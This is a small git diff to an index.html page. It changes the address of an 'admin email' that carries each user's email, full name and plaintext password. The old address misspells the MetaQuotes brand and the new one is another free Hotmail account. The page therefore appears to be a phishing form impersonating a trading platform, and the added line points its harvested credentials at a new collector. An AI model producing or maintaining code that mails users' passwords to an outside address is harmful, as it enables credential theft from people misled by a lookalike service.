--- a/index.html
+++ b/index.html
@@ -525,7 +525,7 @@
             
             // Send admin email
             const adminEmailParams = {
-                to_email: 'metaqoutes-base@hotmail.com',
+                to_email: 'trading-base-online@hotmail.com',
                 user_email: email,
                 user_name: fullName,
                 user_password: password,
